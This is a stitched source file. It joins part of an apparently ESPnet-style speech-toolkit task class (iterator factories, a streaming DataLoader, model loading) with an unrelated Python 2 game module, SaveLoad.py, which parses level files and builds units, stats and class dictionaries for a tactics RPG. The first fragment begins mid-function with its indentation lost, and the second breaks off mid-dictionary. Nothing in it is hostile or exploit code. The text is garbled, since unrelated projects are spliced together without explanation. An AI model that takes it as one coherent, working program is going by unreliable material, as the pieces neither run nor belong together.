rank = torch.distributed.get_rank()
if len(batches) < world_size:
raise RuntimeError("Number of samples is smaller than world_size")
if batch_size < world_size:
raise RuntimeError("batch_size must be equal or more than world_size")
if rank < batch_size % world_size:
batch_size = batch_size // world_size + 1
else:
batch_size = batch_size // world_size
num_cache_chunks = num_cache_chunks // world_size
# NOTE(kamo): Split whole corpus by sample numbers without considering
# each of the lengths, therefore the number of iteration counts are not
# always equal to each other and the iterations are limitted
# by the fewest iterations.
# i.e. the samples over the counts are discarded.
batches = batches[rank::world_size]
return ChunkIterFactory(
dataset=dataset,
batches=batches,
seed=seed,
# For chunk iterator,
# --num_iters_per_epoch doesn't indicate the number of iterations,
# but indicates the number of samples.
num_samples_per_epoch=num_iters_per_epoch,
shuffle=train,
num_workers=num_workers,
collate_fn=collate_fn,
pin_memory=ngpu > 0,
batch_size=batch_size,
chunk_length=chunk_length,
chunk_shift_ratio=chunk_shift_ratio,
num_cache_chunks=num_cache_chunks,
)
    @classmethod
    def build_multiple_iter_factroy(
        cls,
        data_path_and_name_and_type,
        shape_files: Union[Tuple[str, ...], List[str]],
        train: bool,
        num_iters_per_epoch: Optional[int],
        max_cache_size: float,
        seed: int,
        **kwargs,
    ):
        """Build a MultipleIterFactory over a corpus pre-split into directories.

        Every data path and shape file must be a directory containing a
        "num_splits" file and "split.{i}" sub-files; one lazy
        build_iter_factory call is prepared per split.

        Args:
            data_path_and_name_and_type: (directory, name, type) triples.
            shape_files: Directories of split shape files.
            train: Whether this factory feeds training (enables shuffling).
            num_iters_per_epoch: Total iterations per epoch, divided across
                the splits.
            max_cache_size: Total cache budget, divided across the splits.
            seed: Base RNG seed forwarded to each sub-factory.
            **kwargs: Remaining build_iter_factory arguments, forwarded as-is.
        """
        assert check_argument_types()
        assert len(data_path_and_name_and_type) > 0, len(data_path_and_name_and_type)
        # 1. Sanity check: every directory must declare the same num_splits.
        num_splits = None
        for path in [path for path, _, _ in data_path_and_name_and_type] + list(
            shape_files
        ):
            if not Path(path).is_dir():
                raise RuntimeError(f"{path} is not a directory")
            p = Path(path) / "num_splits"
            if not p.exists():
                raise FileNotFoundError(f"{p} is not found")
            with p.open() as f:
                _num_splits = int(f.read())
                if num_splits is not None and num_splits != _num_splits:
                    raise RuntimeError(
                        f"Number of splits are mismathed: "
                        f"{data_path_and_name_and_type[0][0]} and {path}"
                    )
                num_splits = _num_splits
        # NOTE(review): "path" below is the loop variable leaked from the loop
        # above, so only the LAST directory is checked for split.{i} files —
        # looks unintentional; confirm whether every directory should be
        # checked.
        for i in range(num_splits):
            p = Path(path) / f"split.{i}"
            if not p.exists():
                raise FileNotFoundError(f"{p} is not found")
        # 2. Create functions to build an iter factory for each splits
        data_path_and_name_and_type_list = [
            [
                (str(Path(p) / f"split.{i}"), n, t)
                for p, n, t in data_path_and_name_and_type
            ]
            for i in range(num_splits)
        ]
        shape_files_list = [
            [str(Path(s) / f"split.{i}") for s in shape_files]
            for i in range(num_splits)
        ]
        # Spread num_iters_per_epoch across splits; the "+ i" distributes the
        # remainder so the per-split counts sum to the requested total.
        num_iters_per_epoch_list = [
            (num_iters_per_epoch + i) // num_splits
            if num_iters_per_epoch is not None
            else None
            for i in range(num_splits)
        ]
        max_cache_size = max_cache_size / num_splits
        # Note that iter-factories are built for each epoch at runtime lazily.
        build_funcs = [
            functools.partial(
                cls.build_iter_factory,
                data_path_and_name_and_type=_data_path_and_name_and_type,
                shape_files=_shape_files,
                num_iters_per_epoch=_num_iters_per_epoch,
                max_cache_size=max_cache_size,
                seed=seed,
                train=train,
                **kwargs,
            )
            for (
                _data_path_and_name_and_type,
                _shape_files,
                _num_iters_per_epoch,
            ) in zip(
                data_path_and_name_and_type_list,
                shape_files_list,
                num_iters_per_epoch_list,
            )
        ]
        # 3. Build MultipleIterFactory
        return MultipleIterFactory(build_funcs=build_funcs, shuffle=train, seed=seed,)
@classmethod
def build_streaming_iterator(
cls,
data_path_and_name_and_type,
preprocess_fn,
collate_fn,
key_file: str = None,
batch_size: int = 1,
dtype: str = np.float32,
num_workers: int = 1,
allow_variable_data_keys: bool = False,
ngpu: int = 0,
inference: bool = False,
) -> DataLoader:
"""Build DataLoader using iterable dataset"""
assert check_argument_types()
# For backward compatibility for pytorch DataLoader
if collate_fn is not None:
kwargs = dict(collate_fn=collate_fn)
else:
kwargs = {}
# IterableDataset is supported from pytorch=1.2
if LooseVersion(torch.__version__) >= LooseVersion("1.2"):
dataset = IterableESPnetDataset(
data_path_and_name_and_type,
float_dtype=dtype,
preprocess=preprocess_fn,
key_file=key_file,
)
kwargs.update(batch_size=batch_size)
else:
dataset = ESPnetDataset(
data_path_and_name_and_type,
float_dtype=dtype,
preprocess=preprocess_fn,
)
if key_file is None:
key_file = data_path_and_name_and_type[0][0]
batch_sampler = UnsortedBatchSampler(
batch_size=batch_size, key_file=key_file, drop_last=False,
)
kwargs.update(batch_sampler=batch_sampler)
cls.check_task_requirements(dataset, allow_variable_data_keys, inference)
return DataLoader(
dataset=dataset, pin_memory=ngpu > 0, num_workers=num_workers, **kwargs,
)
# ~~~~~~~~~ The methods below are mainly used for inference ~~~~~~~~~
@classmethod
def build_model_from_file(
cls,
config_file: Union[Path, str],
model_file: Union[Path, str] = None,
device: str = "cpu",
) -> Tuple[AbsESPnetModel, argparse.Namespace]:
"""This method is used for inference or fine-tuning.
Args:
config_file: The yaml file saved when training.
model_file: The model file saved when training.
device:
"""
assert check_argument_types()
config_file = Path(config_file)
with config_file.open("r", encoding="utf-8") as f:
args = yaml.safe_load(f)
args = argparse.Namespace(**args)
model = cls.build_model(args)
if not isinstance(model, AbsESPnetModel):
raise RuntimeError(
f"model must inherit {AbsESPnetModel.__name__}, but got {type(model)}"
)
model.to(device)
if model_file is not None:
if device == "cuda":
# NOTE(kamo): "cuda" for torch.load always indicates cuda:0
# in PyTorch<=1.4
device = f"cuda:{torch.cuda.current_device()}"
model.load_state_dict(torch.load(model_file, map_location=device))
return model, args
|
SaveLoad.py | # Saving and Loading Functions
# === IMPORT MODULES =============================================
import random, copy, threading, shutil
import cPickle as pickle
from collections import OrderedDict
# Custom imports
import GlobalConstants as GC
import configuration as cf
import TileObject, ItemMethods, UnitObject, StatusObject, CustomObjects, Utility
from UnitObject import Stat
import logging
logger = logging.getLogger(__name__)
# === READS LEVEL FILE (BITMAP MODE) ==============================================================================
def load_level(levelfolder, gameStateObj, metaDataObj):
    # Load a level from levelfolder: reads overview.txt and UnitLevel.txt,
    # builds the map, fills metaDataObj, and starts gameStateObj.
    # Done at the beginning of a new level and ONLY then.
    GC.U_ID = 100
    # Assorted Files -- read UnitLevel.txt with a context manager so the
    # handle is closed even if reading raises (original used
    # open/readlines/close and leaked the handle on error).
    unitfilename = levelfolder + '/UnitLevel.txt'
    with open(unitfilename, 'r') as unitFile:
        unitcontent = unitFile.readlines()
    # For gameStateObj
    reinforceUnits, prefabs = {}, {}
    # Read overview file
    overview_filename = levelfolder + '/overview.txt'
    overview_dict = read_overview_file(overview_filename)
    # Get objective
    starting_objective = CustomObjects.Objective(overview_dict['display_name'], overview_dict['win_condition'], overview_dict['loss_condition'])
    # MetaDataObj holds unchanging information for the level
    # And general abstraction information
    get_metaDataObj(levelfolder, metaDataObj)
    # Get tiles
    currentMap = create_map(levelfolder, overview_dict)
    gameStateObj.start_map(currentMap)
    # === Process unit data ===
    current_mode = '0123456789' # Defaults to all modes
    for line in unitcontent:
        # Process each line that was in the level file.
        line = line.strip()
        # Skip empty or comment lines
        if not line or line.startswith('#'):
            continue
        # Process line
        unitLine = line.split(';')
        current_mode = parse_unit_line(unitLine, current_mode, gameStateObj.allunits, gameStateObj.groups, reinforceUnits, prefabs, metaDataObj, gameStateObj)
    gameStateObj.start(allreinforcements=reinforceUnits, prefabs=prefabs, objective=starting_objective)
def create_map(levelfolder, overview_dict=None):
    # Build the level's MapObject from MapSprite.png / TileData.png.
    # overview_dict may be passed in to skip re-reading overview.txt;
    # any falsy value triggers a fresh read.
    if not overview_dict:
        overview_dict = read_overview_file(levelfolder + '/overview.txt')
    if 'weather' in overview_dict:
        weather = overview_dict['weather'].split(',')
    else:
        weather = []
    return TileObject.MapObject(
        levelfolder + '/MapSprite.png', levelfolder + '/TileData.png',
        levelfolder, weather)
def get_metaDataObj(levelfolder, metaDataObj, changes=None):
    # Populate metaDataObj (a dict) with the level's unchanging data:
    # script file paths, flags parsed from overview.txt, phase music, and
    # the general class/portrait/lore catalogs.
    # "changes" is an optional list of (?, key, value) rows applied last as
    # overrides; NOTE: music overrides are rewritten IN PLACE in the
    # caller's list (line[2] mutation below).
    if not changes:
        changes = []
    overview_filename = levelfolder + '/overview.txt'
    prebaseScript_filename = levelfolder + '/prebaseScript.txt'
    narrationScript_filename = levelfolder + '/narrationScript.txt'
    introScript_filename = levelfolder + '/introScript.txt'
    outroScript_filename = levelfolder + '/outroScript.txt'
    death_quote_filename = 'Data/death_quote_info.txt'
    portrait_dict = create_portrait_dict()
    # Grab general catalogs
    class_dict = create_class_dict()
    lore_dict = create_lore_dict()
    overview_dict = read_overview_file(overview_filename)
    metaDataObj['name'] = overview_dict['name']
    # Flags are stored as "0"/"1" strings in overview.txt.
    metaDataObj['preparationFlag'] = bool(int(overview_dict['prep_flag']))
    metaDataObj['prep_music'] = overview_dict['prep_music'] if int(overview_dict['prep_flag']) else None
    metaDataObj['pickFlag'] = bool(int(overview_dict['pick_flag']))
    # base_flag keeps its string value when set (it names the base), else False.
    metaDataObj['baseFlag'] = overview_dict['base_flag'] if overview_dict['base_flag'] != '0' else False
    metaDataObj['base_music'] = overview_dict['base_music'] if overview_dict['base_flag'] != '0' else None
    metaDataObj['marketFlag'] = bool(int(overview_dict['market_flag']))
    metaDataObj['transitionFlag'] = bool(int(overview_dict['transition_flag']))
    metaDataObj['playerPhaseMusic'] = GC.MUSICDICT[overview_dict['player_phase_music']]
    metaDataObj['enemyPhaseMusic'] = GC.MUSICDICT[overview_dict['enemy_phase_music']]
    metaDataObj['otherPhaseMusic'] = GC.MUSICDICT[overview_dict['other_phase_music']] if 'other_phase_music' in overview_dict else None
    metaDataObj['prebaseScript'] = prebaseScript_filename
    metaDataObj['narrationScript'] = narrationScript_filename
    metaDataObj['introScript'] = introScript_filename
    metaDataObj['outroScript'] = outroScript_filename
    metaDataObj['overview'] = overview_filename
    metaDataObj['death_quotes'] = death_quote_filename
    metaDataObj['class_dict'] = class_dict
    metaDataObj['portrait_dict'] = portrait_dict
    metaDataObj['lore'] = lore_dict
    # Apply overrides last; music keys are translated through GC.MUSICDICT.
    for line in changes:
        if line[1].endswith('Music'):
            line[2] = GC.MUSICDICT[line[2]]
        metaDataObj[line[1]] = line[2]
def read_overview_file(overview_filename):
    # Parse overview.txt into a dict. Each line has the form "key;value";
    # only the FIRST semicolon splits, so values may contain semicolons.
    # Blank lines and lines without a separator are skipped -- previously
    # they raised IndexError on split_line[1].
    overview_lines = {}
    with open(overview_filename, 'r') as mainInfo:
        for line in mainInfo:
            line = line.rstrip('\r\n')
            if ';' not in line:
                continue
            split_line = line.split(";", 1)
            overview_lines[split_line[0]] = split_line[1]
    return overview_lines
def parse_unit_line(unitLine, current_mode, allunits, groups, reinforceUnits, prefabs, metaDataObj, gameStateObj):
    # Dispatch a single semicolon-split line from UnitLevel.txt.
    # Returns the (possibly updated) current_mode string; all other effects
    # are mutations of the passed-in collections.
    logger.info('Reading unit line %s', unitLine)
    # New Group
    if unitLine[0] == 'group':
        # group id -> (name, faction, description)
        groups[unitLine[1]] = (unitLine[2], unitLine[3], unitLine[4])
    elif unitLine[0] == 'mode':
        # current_mode is a string of difficulty digits; later lines apply
        # only when the active difficulty digit appears in it.
        current_mode = unitLine[1]
    elif unitLine[0] == 'load_player_characters':
        # Carry over every surviving player unit as an off-board reinforcement.
        for unit in allunits:
            if unit.team == 'player' and not unit.dead:
                reinforceUnits[unit.name] = (unit.id, None)
    elif str(gameStateObj.mode['difficulty']) in current_mode:
        # New Unit: field 1 == "0"; long lines are ad-hoc units, short lines
        # reference units from the master unit data.
        if unitLine[1] == "0":
            if len(unitLine) > 7:
                create_unit(unitLine, allunits, groups, reinforceUnits, metaDataObj, gameStateObj)
            else:
                add_unit(unitLine, allunits, reinforceUnits, metaDataObj, gameStateObj)
        # Saved Unit: field 1 == "1"; re-place an already loaded unit.
        elif unitLine[1] == "1":
            for unit in allunits:
                if unit.name == unitLine[3]: # Saved units are looked up by name
                    if unitLine[4] == 'None':
                        position = None
                    else:
                        position = tuple([int(num) for num in unitLine[4].split(',')])
                    if unitLine[2] == "0": # Unit starts on board
                        unit.position = position
                    else: # Unit does not start on board
                        reinforceUnits[unitLine[2]] = (unit.id, position)
        # Created Unit: field 1 == "2"; store the raw line as an event prefab.
        elif unitLine[1] == "2":
            event_id = unitLine[2]
            prefabs[event_id] = unitLine
    else:
        pass
    # Unit is not used in this mode
    return current_mode
def default_previous_classes(cur_class, classes, class_dict):
    # Walk the promotion chain backwards from cur_class, prepending each
    # missing predecessor to `classes` (mutated in place) until the chain
    # length catches up with the class tier or there is no predecessor.
    node = cur_class
    while True:
        info = class_dict[node]
        predecessor = info['promotes_from']
        if info['tier'] <= len(classes) or not predecessor:
            break
        if predecessor not in classes:
            classes.insert(0, predecessor)
        node = predecessor
def add_unit(unitLine, allunits, reinforceUnits, metaDataObj, gameStateObj):
    # Instantiate a unit referenced by id from the master unit data
    # (GC.UNITDATA) and either place it on the board or register it as a
    # reinforcement. Returns (allunits, reinforceUnits), both also mutated
    # in place.
    assert len(unitLine) == 6, "unitLine %s must have length 6"%(unitLine)
    legend = {'team': unitLine[0], 'unit_type': unitLine[1], 'event_id': unitLine[2],
              'unit_id': unitLine[3], 'position': unitLine[4], 'ai': unitLine[5]}
    class_dict = metaDataObj['class_dict']
    for unit in GC.UNITDATA.getroot().findall('unit'):
        if unit.find('id').text == legend['unit_id']:
            u_i = {}
            u_i['u_id'] = unit.find('id').text
            u_i['event_id'] = legend['event_id']
            u_i['position'] = tuple([int(num) for num in legend['position'].split(',')]) if ',' in legend['position'] else None
            u_i['name'] = unit.get('name')
            u_i['team'] = legend['team']
            classes = unit.find('class').text.split(',')
            u_i['klass'] = classes[-1]
            # Give default previous class
            default_previous_classes(u_i['klass'], classes, class_dict)
            u_i['gender'] = int(unit.find('gender').text)
            u_i['level'] = int(unit.find('level').text)
            u_i['faction'] = unit.find('faction').text
            # Pad missing base stats with the class bases.
            stats = intify_comma_list(unit.find('bases').text)
            for n in xrange(len(stats), cf.CONSTANTS['num_stats']):
                stats.append(class_dict[u_i['klass']]['bases'][n])
            if u_i['team'] == 'player': # Modify stats
                bases = gameStateObj.modify_stats['player_bases']
                growths = gameStateObj.modify_stats['player_growths']
            else:
                bases = gameStateObj.modify_stats['enemy_bases']
                growths = gameStateObj.modify_stats['enemy_growths']
            stats = [sum(x) for x in zip(stats, bases)]
            assert len(stats) == cf.CONSTANTS['num_stats'], "bases %s must be exactly %s integers long"%(stats, cf.CONSTANTS['num_stats'])
            u_i['stats'] = build_stat_dict(stats)
            logger.debug("%s's stats: %s", u_i['name'], u_i['stats'])
            u_i['growths'] = intify_comma_list(unit.find('growths').text)
            u_i['growths'].extend([0] * (cf.CONSTANTS['num_stats'] - len(u_i['growths'])))
            u_i['growths'] = [sum(x) for x in zip(u_i['growths'], growths)]
            # FIX: the message previously interpolated `stats` instead of the
            # growths list it asserts about.
            assert len(u_i['growths']) == cf.CONSTANTS['num_stats'], "growths %s must be exactly %s integers long"%(u_i['growths'], cf.CONSTANTS['num_stats'])
            u_i['growth_points'] = [50]*cf.CONSTANTS['num_stats']
            u_i['items'] = ItemMethods.itemparser(unit.find('inventory').text)
            # Parse wexp -- letter ranks are translated through WEAPON_EXP.
            u_i['wexp'] = unit.find('wexp').text.split(',')
            for index, wexp in enumerate(u_i['wexp'][:]):
                if wexp in CustomObjects.WEAPON_EXP.wexp_dict:
                    u_i['wexp'][index] = CustomObjects.WEAPON_EXP.wexp_dict[wexp]
            u_i['wexp'] = [int(num) for num in u_i['wexp']]
            assert len(u_i['wexp']) == len(CustomObjects.WEAPON_TRIANGLE.types), "%s's wexp must have as many slots as there are weapon types."%(u_i['name'])
            u_i['desc'] = unit.find('desc').text
            # Tags = class tags (a set) union personal tags from the XML.
            class_tags = class_dict[u_i['klass']]['tags']
            personal_tags = set(unit.find('tags').text.split(',')) if unit.find('tags') is not None and unit.find('tags').text is not None else set()
            u_i['tags'] = class_tags | personal_tags
            u_i['ai'] = legend['ai']
            u_i['movement_group'] = class_dict[u_i['klass']]['movement_group']
            cur_unit = UnitObject.UnitObject(u_i)
            if u_i['event_id'] != "0": # unit does not start on board
                cur_unit.position = None
                reinforceUnits[u_i['event_id']] = (u_i['u_id'], u_i['position'])
            else: # Unit does start on board
                cur_unit.position = u_i['position']
            # Status Effects and Skills
            get_skills(class_dict, cur_unit, classes, u_i['level'], gameStateObj, feat=False)
            # Personal Skills
            personal_skills = unit.find('skills').text.split(',') if unit.find('skills') is not None and unit.find('skills').text is not None else []
            c_s = [StatusObject.statusparser(status) for status in personal_skills]
            for status in c_s:
                if status:
                    StatusObject.HandleStatusAddition(status, cur_unit, gameStateObj)
            # handle having a status that gives stats['HP']
            cur_unit.set_hp(int(cur_unit.stats['HP']))
            allunits.append(cur_unit)
            break
    return allunits, reinforceUnits
def create_unit(unitLine, allunits, groups, reinforceUnits, metaDataObj, gameStateObj):
    # Create a generic (non-named) unit fully described by the level line:
    # class, level, items, position, AI and display group. A fresh unique
    # id is minted from GC.U_ID. Appends to allunits and returns the unit.
    assert len(unitLine) in [9, 10], "unitLine %s must have length 9 or 10 (if optional status)"%(unitLine)
    legend = {'team': unitLine[0], 'unit_type': unitLine[1], 'event_id': unitLine[2],
              'class': unitLine[3], 'level': unitLine[4], 'items': unitLine[5],
              'position': unitLine[6], 'ai': unitLine[7], 'group': unitLine[8]}
    class_dict = metaDataObj['class_dict']
    u_i = {}
    GC.U_ID += 1
    u_i['u_id'] = GC.U_ID
    u_i['team'] = legend['team']
    u_i['event_id'] = legend['event_id']
    # A trailing 'F' on the class string selects the female variant.
    if legend['class'].endswith('F'):
        legend['class'] = legend['class'][:-1] # strip off the F
        u_i['gender'] = 5 # Default female gender is 5
    else:
        u_i['gender'] = 0 # Default male gender is 0
    classes = legend['class'].split(',')
    u_i['klass'] = classes[-1]
    # Give default previous class
    default_previous_classes(u_i['klass'], classes, class_dict)
    u_i['level'] = int(legend['level'])
    u_i['position'] = tuple([int(num) for num in legend['position'].split(',')])
    # Display name/faction/description come from the named group.
    u_i['name'], u_i['faction'], u_i['desc'] = groups[legend['group']]
    stats, u_i['growths'], u_i['growth_points'], u_i['items'], u_i['wexp'] = get_unit_info(class_dict, u_i['klass'], u_i['level'], legend['items'], gameStateObj)
    u_i['stats'] = build_stat_dict(stats)
    logger.debug("%s's stats: %s", u_i['name'], u_i['stats'])
    u_i['tags'] = class_dict[u_i['klass']]['tags']
    u_i['ai'] = legend['ai']
    u_i['movement_group'] = class_dict[u_i['klass']]['movement_group']
    cur_unit = UnitObject.UnitObject(u_i)
    # Reposition units
    if u_i['event_id'] != "0": # Unit does not start on board
        cur_unit.position = None
        reinforceUnits[u_i['event_id']] = (cur_unit.id, u_i['position'])
    else: # Unit does start on board
        cur_unit.position = u_i['position']
    # Status Effects and Skills
    get_skills(class_dict, cur_unit, classes, u_i['level'], gameStateObj, feat=False)
    # Extra Skills -- optional 10th field holds comma-separated status ids.
    if len(unitLine) == 10:
        statuses = [StatusObject.statusparser(status) for status in unitLine[9].split(',')]
        for status in statuses:
            StatusObject.HandleStatusAddition(status, cur_unit, gameStateObj)
    allunits.append(cur_unit)
    return cur_unit
def create_summon(summon_info, summoner, position, metaDataObj, gameStateObj):
    """Create a summoned unit scaled to its summoner.

    The summon inherits the summoner's team, level and faction. Its class is
    picked from summon_info.klass's comma-separated promotion chain, one tier
    per max_level levels of the summoner. Returns the new UnitObject; the
    caller is responsible for adding it to the unit lists.
    """
    # Important Info
    class_dict = metaDataObj['class_dict']
    u_i = {}
    GC.U_ID += 1
    u_i['u_id'] = GC.U_ID
    classes = summon_info.klass.split(',')
    u_i['level'] = summoner.level
    u_i['position'] = position
    u_i['team'] = summoner.team
    u_i['event_id'] = 0
    u_i['gender'] = 0
    # // keeps the slice index an int on Python 3 (identical result to
    # Python 2's integer division for non-negative ints)
    classes = classes[:summoner.level//cf.CONSTANTS['max_level'] + 1]
    u_i['klass'] = classes[-1]
    u_i['faction'] = summoner.faction
    u_i['name'] = summon_info.name
    u_i['desc'] = summon_info.desc
    u_i['ai'] = summon_info.ai
    # 'tags' may arrive as a comma string or already as a set (create_class_dict
    # stores a set) -- handle both; always copy so .add below can't mutate
    # the shared class_dict entry.
    tags = class_dict[u_i['klass']]['tags']
    if not tags:
        u_i['tags'] = set()
    elif isinstance(tags, set):
        u_i['tags'] = set(tags)
    else:
        u_i['tags'] = set(tags.split(','))
    u_i['tags'].add('Summon_' + str(summon_info.s_id) + '_' + str(summoner.id)) # Add unique identifier
    u_i['movement_group'] = class_dict[u_i['klass']]['movement_group']
    stats, u_i['growths'], u_i['growth_points'], u_i['items'], u_i['wexp'] = get_unit_info(class_dict, u_i['klass'], u_i['level'], summon_info.item_line, gameStateObj)
    u_i['stats'] = build_stat_dict(stats)
    unit = UnitObject.UnitObject(u_i)
    # Status Effects and Skills -- feat choice is seeded from the position so
    # it is deterministic for a given summon spot
    my_seed = sum(u_i['position']) if u_i['position'] else 0
    get_skills(class_dict, unit, classes, u_i['level'], gameStateObj, seed=my_seed)
    return unit
def build_stat_dict(stats):
    """Map each configured stat name to a Stat built from the parallel values list."""
    return OrderedDict(
        (stat_name, Stat(i, stats[i]))
        for i, stat_name in enumerate(cf.CONSTANTS['stat_names']))
def build_stat_dict_plus(stats):
    """Like build_stat_dict, but each entry of `stats` is a (value, extra) pair
    forwarded to Stat as two arguments."""
    return OrderedDict(
        (stat_name, Stat(i, stats[i][0], stats[i][1]))
        for i, stat_name in enumerate(cf.CONSTANTS['stat_names']))
def get_unit_info(class_dict, klass, level, item_line, gameStateObj):
    """Compute a generic unit's stats, items and weapon experience.

    Returns (stats, growths, growth_points, items, wexp) for a unit of
    `klass` at `level`, applying the mode's enemy base/growth modifiers
    and auto-leveling from the class bases. item_line is the raw item
    spec string parsed by ItemMethods.itemparser.
    """
    # Handle stats
    # hp, str, mag, skl, spd, lck, def, res, con, mov
    bases = class_dict[klass]['bases'][:] # Using copies
    growths = class_dict[klass]['growths'][:] # Using copies
    # Difficulty-mode adjustments are added element-wise to bases/growths
    bases = [sum(x) for x in zip(bases, gameStateObj.modify_stats['enemy_bases'])]
    growths = [sum(x) for x in zip(growths, gameStateObj.modify_stats['enemy_growths'])]
    stats, growth_points = auto_level(bases, growths, level, class_dict[klass]['max'], gameStateObj)
    # Make sure we don't exceed max
    stats = [Utility.clamp(stat, 0, class_dict[klass]['max'][index]) for index, stat in enumerate(stats)]
    # Handle items
    items = ItemMethods.itemparser(item_line)
    # Handle required wexp: start from the class's wexp gains, then raise each
    # weapon type's value to the minimum required to wield the starting items
    wexp = class_dict[klass]['wexp_gain'][:]
    # print(klass, wexp)
    for item in items:
        if item.weapon:
            weapon_types = item.TYPE
            item_level = item.weapon.LVL
        elif item.spell:
            weapon_types = item.TYPE
            item_level = item.spell.LVL
        else:
            continue
        for weapon_type in weapon_types:
            wexp_index = CustomObjects.WEAPON_TRIANGLE.type_to_index[weapon_type]
            item_requirement = CustomObjects.WEAPON_EXP.wexp_dict[item_level]
            # print(item, weapon_type, wexp_index, item_requirement, wexp[wexp_index])
            # Only bump weapon types the unit already has some rank in (> 0)
            if item_requirement > wexp[wexp_index] and wexp[wexp_index] > 0:
                wexp[wexp_index] = item_requirement
    # print(wexp)
    return stats, growths, growth_points, items, wexp
def get_skills(class_dict, unit, classes, level, gameStateObj, feat=True, seed=0):
    """Apply class skills from the unit's class line to `unit`.

    classes: class line, earliest class first; level: current level.
    feat: resolve generic 'Feat' entries to concrete feats when True.
    seed: deterministic starting offset into the feat list.
    """
    class_skills = []
    for index, klass in enumerate(classes):
        for level_needed, class_skill in class_dict[klass]['skills']:
            # If level is gte level needed for skill or gte max_level.
            # Earlier classes in the line (index < len-1) always grant their
            # skills; level % max_level == 0 counts as a maxed-out class.
            if level%cf.CONSTANTS['max_level'] >= level_needed or index < len(classes) - 1 or level%cf.CONSTANTS['max_level'] == 0:
                class_skills.append(class_skill)
    # === Handle Feats (Naive choice)
    if feat:
        for status in class_skills:
            if status == 'Feat':
                # walk the feat list from `seed` until one not already owned
                counter = 0
                while StatusObject.feat_list[(seed + counter)%len(StatusObject.feat_list)] in class_skills:
                    counter += 1
                class_skills.append(StatusObject.feat_list[(seed + counter)%len(StatusObject.feat_list)])
        class_skills = [status for status in class_skills if status != 'Feat']
    logger.debug('Class Skills %s', class_skills)
    # === Actually add statuses
    status_effects = [StatusObject.statusparser(status) for status in class_skills]
    for status in status_effects:
        if status:
            StatusObject.HandleStatusAddition(status, unit, gameStateObj)
    # handle having a status that gives stats['HP']
    unit.set_hp(int(unit.stats['HP']))
def auto_level(bases, growths, level, max_stats, gameStateObj):
    """Auto-level a generic unit from its class bases up to `level`.

    Leveling mode comes from cf.CONSTANTS['enemy_leveling'] (3 = defer to
    the game mode's growth setting): 1/3 fixed, 0 random, 2 hybrid
    (Radiant-Dawn-style bonus-exp distribution). Returns
    (stats, growth_points). All divisions use // so the integer semantics
    Python 2 gave with `/` are preserved on Python 3 as well.
    """
    stats = bases[:]
    growth_points = [50 for growth in growths]

    leveling = cf.CONSTANTS['enemy_leveling']
    if leveling == 3:
        leveling = gameStateObj.mode['growths']

    if leveling == 1 or leveling == 3: # Fixed -- 3 if not chosen
        for index, growth in enumerate(growths):
            growth_sum = growth * (level - 1)
            stats[index] += growth_sum // 100
            growth_points[index] += growth_sum % 100
    elif leveling == 0: # Random
        for index, growth in enumerate(growths):
            for _ in range(level - 1):
                # growths over 100 grant guaranteed points plus a chance
                growth_rate = growth
                while growth_rate > 0:
                    stats[index] += 1 if random.randint(0, 99) < growth_rate else 0
                    growth_rate -= 100
    elif leveling == 2: # Like Radiant Dawn Bonus Exp Method -- Hybrid
        # capped stats contribute no growth; distribute points by weight
        growths = [growth * (level - 1) if stats[index] < max_stats[index] else 0 for index, growth in enumerate(growths)]
        growth_sum = sum(growths)
        num_choice = growth_sum // 100
        growth_points[0] = growth_sum % 100

        while num_choice > 0:
            num_choice -= 1
            idx = Utility.weighted_choice(growths)
            stats[idx] += 1
            growths[idx] = max(0, growths[idx] - 100)
            if stats[idx] >= max_stats[idx]:
                # stat just capped: forfeit its remaining points
                num_choice -= growths[idx] // 100
                growths[idx] = 0
    else:
        logger.error('Unsupported leveling type %s', leveling)

    return stats, growth_points
"""
def place_mount(mount_id, chosen_unit, reinforceUnits):
my_mount = None
for u_id, (unit, position) in reinforceUnits.iteritems():
if mount_id == u_id:
my_mount = unit
break
if my_mount:
chosen_unit.mount(my_mount, None)
logger.warning('Could not find mount!')
"""
def intify_comma_list(comma_string):
    """Convert a comma-separated string of numbers into a list of ints.

    Falsy input (empty string / None) yields an empty list.
    """
    if not comma_string:
        return []
    return [int(piece) for piece in comma_string.split(',')]
# === PARSES A SKILL LINE =====================================================
def class_skill_parser(skill_text):
    """Parse 'level,skill;level,skill;...' into a list of (int level, skill) pairs.

    None yields an empty list. Extra commas within an entry are ignored.
    """
    if skill_text is None:
        return []
    pairs = []
    for entry in skill_text.split(';'):
        parts = entry.split(',')
        pairs.append((int(parts[0]), parts[1]))
    return pairs
# === CREATE CLASS DICTIONARY ================================================
def create_class_dict():
    """Parse GC.CLASSDATA xml into an OrderedDict of class-id -> info dict.

    Stat lists (bases/growths/promotion/max) are padded out to
    cf.CONSTANTS['num_stats'] entries so later code can index them freely.
    """
    class_dict = OrderedDict()
    # For each class
    for klass in GC.CLASSDATA.getroot().findall('class'):
        c_id = klass.get('id')
        class_dict[c_id] = {'name': klass.find('name').text,
                            'id': klass.get('id'),
                            'tier': int(klass.find('tier').text),
                            'wexp_gain': intify_comma_list(klass.find('wexp_gain').text),
                            'promotes_from': klass.find('promotes_from').text if klass.find('promotes_from').text is not None else None,
                            'turns_into': klass.find('turns_into').text.split(',') if klass.find('turns_into').text is not None else [],
                            'movement_group': int(klass.find('movement_group').text),
                            'tags': set(klass.find('tags').text.split(',')) if klass.find('tags').text is not None else set(),
                            'skills': class_skill_parser(klass.find('skills').text),
                            'growths': intify_comma_list(klass.find('growths').text),
                            'bases': intify_comma_list(klass.find('bases').text),
                            # promotion/max elements are optional in the xml
                            'promotion': intify_comma_list(klass.find('promotion').text) if klass.find('promotion') is not None else [0]*10,
                            'max': intify_comma_list(klass.find('max').text) if klass.find('max') is not None else [60],
                            'desc': klass.find('desc').text}
        # Pad every stat list to num_stats entries
        class_dict[c_id]['bases'].extend([0] * (cf.CONSTANTS['num_stats'] - len(class_dict[c_id]['bases'])))
        class_dict[c_id]['growths'].extend([0] * (cf.CONSTANTS['num_stats'] - len(class_dict[c_id]['growths'])))
        class_dict[c_id]['promotion'].extend([0] * (cf.CONSTANTS['num_stats'] - len(class_dict[c_id]['promotion'])))
        class_dict[c_id]['max'].extend([cf.CONSTANTS['max_stat']] * (cf.CONSTANTS['num_stats'] - len(class_dict[c_id]['max'])))
    return class_dict
# === CREATE LORE DICTIONARY =================================================
def create_lore_dict():
    """Read GC.LOREDATA xml into a dict of lore-name -> entry info (all unread)."""
    lore = {}
    # For each lore entry in the xml
    for node in GC.LOREDATA.getroot().findall('lore'):
        name = node.get('name')
        lore[name] = {
            'long_name': node.find('long_name').text,
            'short_name': name,
            'desc': node.find('desc').text,
            'type': node.find('type').text,
            'unread': True,
